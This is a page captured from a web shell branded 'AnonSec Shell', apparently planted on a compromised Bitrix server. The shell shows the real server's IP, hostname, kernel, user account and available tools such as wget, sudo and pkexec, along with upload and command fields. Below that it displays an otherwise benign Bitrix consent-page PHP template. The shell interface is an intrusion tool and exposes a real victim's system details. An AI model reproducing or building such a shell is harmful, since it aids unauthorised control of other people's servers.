AnonSec Shell
Server IP : 85.193.89.191  /  Your IP : 18.118.30.33
Web Server : Apache
System : Linux 956367-cx40159.tmweb.ru 3.10.0-1160.105.1.el7.x86_64 #1 SMP Thu Dec 7 15:39:45 UTC 2023 x86_64
User : bitrix ( 600)
PHP Version : 8.1.27
Disable Function : NONE
MySQL : OFF  |  cURL : OFF  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /home/bitrix/www/bitrix/components/bitrix/sender.consent/templates/.default/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME ]     

Current File : /home/bitrix/www/bitrix/components/bitrix/sender.consent/templates/.default/template.php
<?php
if (!defined("B_PROLOG_INCLUDED") || B_PROLOG_INCLUDED!==true)
{
	die();
}

use Bitrix\Main\Localization\Loc;
/** @var CMain $APPLICATION */
/** @var array $arParams */
/** @var array $arResult */

\Bitrix\Main\UI\Extension::load([
	'ui.design-tokens',
	'ui.fonts.opensans',
	'ui.layout-form',
	'ui.buttons',
	'ui.common',
]);
?>

<?if($arParams['SHOW_HTML_META'] === 'Y'):?>
	<!doctype html>
	<html>
	<head>
		<meta name="viewport" content="width=device-width, user-scalable=no, initial-scale=1.0, maximum-scale=1.0, minimum-scale=1.0">
		<meta http-equiv="X-UA-Compatible" content="ie=edge">
		<?$APPLICATION->ShowHead()?>
	</head>
	<body>
<?endif;?>
<div class="sender-message-done">
	<div class="sender-message-mailing-icon<?=($arResult['METHOD'] === 'apply') ? '' : ' --error'?>"></div>
<!--	<div class="ui-title-1">--><?//=Loc::getMessage('SENDER_CONSENT_DEFAULT_TITLE')?><!--</div>-->
	<div class="ui-title-1"
	>			<?if($arResult['SUCCESS']):?>
			<?=$arResult['METHOD'] === 'apply'? Loc::getMessage('SENDER_CONSENT_APPLY') : Loc::getMessage('SENDER_CONSENT_REJECT')?>
		<?elseif(!empty($arResult["ERROR"])):?>
			<?=htmlspecialcharsbx($arResult["ERROR"])?>
		<?endif;?>
	</div>
</div>
<?if($arParams['SHOW_HTML_META'] === 'Y'):?>
	</body>
	</html>
<?endif;?>

Anon7 - 2022
AnonSec Team